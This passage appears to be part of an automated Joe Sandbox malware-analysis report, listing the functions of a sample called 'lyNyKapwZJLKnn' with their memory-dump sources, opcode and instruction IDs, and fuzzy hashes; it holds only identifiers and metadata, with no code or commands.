                                                                                • Opcode Fuzzy Hash: 8c3381ebad70aa0daa9db0736518c8b18de76c70150faac21576a9aa703447e0
                                                                                • Instruction Fuzzy Hash: 4331A478E11209CFCB49DFA8E59489DBBF2FF49305B208469E819AB364D731AD46CF41
                                                                                Function 01149761 Relevance: .1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7ddc5e2718959111268fc05e9907f6ce6d20ef10e36703a2420ca8e2e030a7e4
                                                                                • Instruction ID: 626b4c6b08e894476df2934780c49909da3a42f35a9733d9547e523354b43bf3
                                                                                • Opcode Fuzzy Hash: 7ddc5e2718959111268fc05e9907f6ce6d20ef10e36703a2420ca8e2e030a7e4
                                                                                • Instruction Fuzzy Hash: 15218D70E0124DDFDB19CFA9D550AEEBFB6AF88209F148069E515A7294DB30D941CF60
                                                                                Function 011462F0 Relevance: .1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c718e41a45ee494ddc1b9a2dbefc29f103ff11ccde8afbe7336d5a4ce71c1936
                                                                                • Instruction ID: db520193a30daf96b2ffa491449110555d0f7fee0e6ca2849a62c48a4dd41a2d
                                                                                • Opcode Fuzzy Hash: c718e41a45ee494ddc1b9a2dbefc29f103ff11ccde8afbe7336d5a4ce71c1936
                                                                                • Instruction Fuzzy Hash: 9C11E33570A5518FD72D9B2AD45852E7BA2FFCAA9530940B9E50ACB364CF20DC02C791
                                                                                Function 011427F0 Relevance: .1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5a9742b5f35e16951d8f4d54417b603f2ea24002a908664e20d2afb18e6aa2d6
                                                                                • Instruction ID: ebf488c1c135df184c99aa9c18a0c059ebf2569d6972e25f7146ef4e5d3ddafc
                                                                                • Opcode Fuzzy Hash: 5a9742b5f35e16951d8f4d54417b603f2ea24002a908664e20d2afb18e6aa2d6
                                                                                • Instruction Fuzzy Hash: F721EF74D0620A8FCB05DFA9D8455EEBFF0FF0A310F10426AE819B2214EB355A85CBA1
                                                                                Function 0114F640 Relevance: .1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 096e10fdd8c3209129760f55f0d2e75373ff4a83484a90e9ab3b66726cf0cbb0
                                                                                • Instruction ID: ffe686efd1f9279b1b4d44b7172b32a3ec5cde644ac82a4c47bd67be5dc01581
                                                                                • Opcode Fuzzy Hash: 096e10fdd8c3209129760f55f0d2e75373ff4a83484a90e9ab3b66726cf0cbb0
                                                                                • Instruction Fuzzy Hash: 4E216DB4D0020A9FDB05EFADD550A9EBFF2FB40705F0085A9D048DB618E7309A45CF80
                                                                                Function 0114F650 Relevance: .1, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b2630c8596117fdfd2c53047ed79a382952145d8172e6ffcf887925d042e455f
                                                                                • Instruction ID: 7fe0bfc2f24a9db16567d3a87c30adad5950206fbd1addd8ecd0775dc45e5fa7
                                                                                • Opcode Fuzzy Hash: b2630c8596117fdfd2c53047ed79a382952145d8172e6ffcf887925d042e455f
                                                                                • Instruction Fuzzy Hash: EC1137B4D0021A9FDB44EFADD590A9EBFF2FB44705F00C9A9D058AB258EB305A45CF81
                                                                                Function 010FD03F Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142182553.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_10fd000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                • Instruction ID: 33d71e8e7caafc2222238413196d9e6e72065d29f5f3f70a60a24145a746f9b9
                                                                                • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                • Instruction Fuzzy Hash: 9F11BB75504284DFDB12CF54C9C5B15BBA2FB84324F24C6ADEA894B692C33AD44ACB62
                                                                                Function 01145E98 Relevance: .1, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c837d2cb64ea739ef4ecf616e33d40837b2747d0e57bb51d351c4bcfcc410ed4
                                                                                • Instruction ID: 408b9b10c218801ed7a6a24cf7467cc2a697668a240c08f21c6c29c55c416c67
                                                                                • Opcode Fuzzy Hash: c837d2cb64ea739ef4ecf616e33d40837b2747d0e57bb51d351c4bcfcc410ed4
                                                                                • Instruction Fuzzy Hash: 5E016D327092556FCB1A8E6498105EE3FA7DBCA650B19805AF901DB384CF318D028795
                                                                                Function 0114ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cf82a41ba0b913bcb3ac541a81ef9d77803855a72dfd17397f35a801e73098bd
                                                                                • Instruction ID: d88f5174e3c8198222aa440a2b582ea775483f251958228af9ac58cfde31817b
                                                                                • Opcode Fuzzy Hash: cf82a41ba0b913bcb3ac541a81ef9d77803855a72dfd17397f35a801e73098bd
                                                                                • Instruction Fuzzy Hash: E4F0F6313806104B972E5A2EE854A2ABADEEFC9E55347407AE90BC7361EF21CC038384
                                                                                Function 0114E8E8 Relevance: .0, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b6a44085dba9a59f960f5825a147c6da5a500f5f92e67be844336058062f39c0
                                                                                • Instruction ID: bb688a7934906f32e12490f91222c41d99dbda3de432b119317d35c2554cd4dc
                                                                                • Opcode Fuzzy Hash: b6a44085dba9a59f960f5825a147c6da5a500f5f92e67be844336058062f39c0
                                                                                • Instruction Fuzzy Hash: 7B118C78D0824AEFDB02DFA8D9409EEBBB1FB49304F00406AD914E3755D7355A1ACF92
                                                                                Function 01149C29 Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d5a717b31d28824ca3da3195086451e2606df576fb1ffe846bd924fa61f3c21d
                                                                                • Instruction ID: 0d14a4bdcba01d40a54ccf1d7651678ac982bece668785044c2106ae5eaa1944
                                                                                • Opcode Fuzzy Hash: d5a717b31d28824ca3da3195086451e2606df576fb1ffe846bd924fa61f3c21d
                                                                                • Instruction Fuzzy Hash: 36F05832A112189FCB59DF699808AEEBBF5EBCC324F11C06AE918C7215E3315A158B91
                                                                                Function 011428A2 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 48fe8d45e89088c11bb333db91b21c3fa0c3b8a625ecaa554c4469cec4fbe5a0
                                                                                • Instruction ID: 9842f7eb012a9346696b8e0041458be62f3cae57cae364a177830cd738a03c37
                                                                                • Opcode Fuzzy Hash: 48fe8d45e89088c11bb333db91b21c3fa0c3b8a625ecaa554c4469cec4fbe5a0
                                                                                • Instruction Fuzzy Hash: 4EE0DF31D14726CBCB02EBB09C000EEB734AE82261B48466BC0A536191EB346759C7A2
                                                                                Function 011428B0 Relevance: .0, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ebe3cee8a82fce7dcca0c4f2284ba6dda04ee3693eb03aaf92888c83ff9fb324
                                                                                • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                • Opcode Fuzzy Hash: ebe3cee8a82fce7dcca0c4f2284ba6dda04ee3693eb03aaf92888c83ff9fb324
                                                                                • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                Function 01146739 Relevance: .0, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 21b2558975ca0e310bfe46fda9bdd1b218fa68170e430f8d3707a4a04556600f
                                                                                • Instruction ID: 7acce0516996b08ca45fe228463ab061cf989390faab83b8a582a6149e39705f
                                                                                • Opcode Fuzzy Hash: 21b2558975ca0e310bfe46fda9bdd1b218fa68170e430f8d3707a4a04556600f
                                                                                • Instruction Fuzzy Hash: BAE0C23100F3E54EC703A374A9240843F369A9310A71889EAD0498F5AFCDA5084AC322
                                                                                Function 01148EF8 Relevance: .0, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                • Instruction ID: 99c4d09160c2ba20e18b2383bc2d7e4c27cb92f77ffaba1f9a31b4ba07e12d4a
                                                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                • Instruction Fuzzy Hash: 3EC08C3320C1282BA23D108E7C40EA3BB8DC3C6BB4A220137FB1CD3201EC429C8001FA
                                                                                Function 0114D6D4 Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fad4ccebe2d23c179d8ad592494644b7e6f8368304cec55281741335584b7018
                                                                                • Instruction ID: 689e8fe6e439a3c94800b03f4b1d5dc116a9d63b2c99b9db1c444e5422858baf
                                                                                • Opcode Fuzzy Hash: fad4ccebe2d23c179d8ad592494644b7e6f8368304cec55281741335584b7018
                                                                                • Instruction Fuzzy Hash: F3D0E234E01108CBCF34DFA8F4844DCFBB0EF58322B10542AD829A3200C6301451CF01
                                                                                Function 0114AFAD Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a0d61ef2906c5939315c85378461842754f8c72f2a5b018583927392ef5363d4
                                                                                • Instruction ID: c55426e6cae5c45d562f2e3247dbf528068656e509dea91b68eab7d19ae3bf2d
                                                                                • Opcode Fuzzy Hash: a0d61ef2906c5939315c85378461842754f8c72f2a5b018583927392ef5363d4
                                                                                • Instruction Fuzzy Hash: DBD0673AB410189FCB149F98E8408DDF7B6FB98221B448126E926A3265C631A965DB54
                                                                                Function 01146748 Relevance: .0, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b85f83b914db97eb1b00a5a091907cd8de3e95fdbacb7c5145b2516a2c07c3a2
                                                                                • Instruction ID: 42ea0c1388098a7eeaf0a768676e9fb4ef5d061031cf3ca0c7309eee3d48958c
                                                                                • Opcode Fuzzy Hash: b85f83b914db97eb1b00a5a091907cd8de3e95fdbacb7c5145b2516a2c07c3a2
                                                                                • Instruction Fuzzy Hash: 58C0123000632D4EC545F765ED4569577AEA7902067408974A10A0BA4DDEB45C858794

                                                                                Non-executed Functions

                                                                                Function 01146920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.4142435959.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_1140000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                • API String ID: 0-3001612457
                                                                                • Opcode ID: c06117dff79adf1d9a9a6bad5deb6b2dceb1d74b839c00b4062f1747a48cbfb6
                                                                                • Instruction ID: e6c15faeacb6fc10ae10860f78d5c91dfe58659c32ce97b2989968ba441c5b9e
                                                                                • Opcode Fuzzy Hash: c06117dff79adf1d9a9a6bad5deb6b2dceb1d74b839c00b4062f1747a48cbfb6
                                                                                • Instruction Fuzzy Hash: 5401B1397001158FCB2C8E2CC444A6537EBAF8AF697154469E54ACB3A1EBB1DC41C741